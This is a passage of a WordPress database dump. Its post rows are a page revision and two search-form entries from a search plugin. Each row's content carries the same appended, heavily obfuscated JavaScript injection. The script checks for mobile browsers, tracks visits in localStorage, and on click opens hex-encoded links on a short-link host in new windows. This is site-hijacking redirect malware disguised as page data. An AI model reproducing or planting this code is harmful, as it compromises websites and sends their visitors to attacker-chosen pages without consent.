Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-11 20:35:00','2022-11-11 20:35:00','',3066,'https://gsw2023.com/?p=3308',0,'revision','',0),
(3309,1,'2022-11-11 21:49:55','2022-11-11 21:49:55','post\npage\nattachment\ngive_forms\n1\n1\n1\npublish\ninherit\n\ndate\nDESC\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Custom Search Form','','publish','closed','closed','','custom-search-form','','','2022-11-11 21:49:55','2022-11-11 21:49:55','',0,'https://gsw2023.com/?p=3309',0,'is_search_form','',0),
(3310,1,'2022-11-11 21:49:56','2022-11-11 21:49:56','post\npage\ngive_forms\n1\n1\n1\npublish\ninherit\n\ndate\nDESC\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Default Search Form','','publish','closed','closed','','default-search-form','','','2022-11-11 21:49:56','2022-11-11 21:49:56','',0,'https://gsw2023.com/?p=3310',0,'is_search_form','',0),
(3311,1,'2022-11-11 21:49:56','2022-11-11 21:49:56','post\npage\nattachment\ngive_forms\n1\n1\n1\npublish\ninherit\n\ndate\nDESC\n1\n1\nexcerpt\n20\n1\n1\n400\nNothing found\n1\nMore Results..\nboth\n1\n1\n1\nall\ndate\ndesc\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 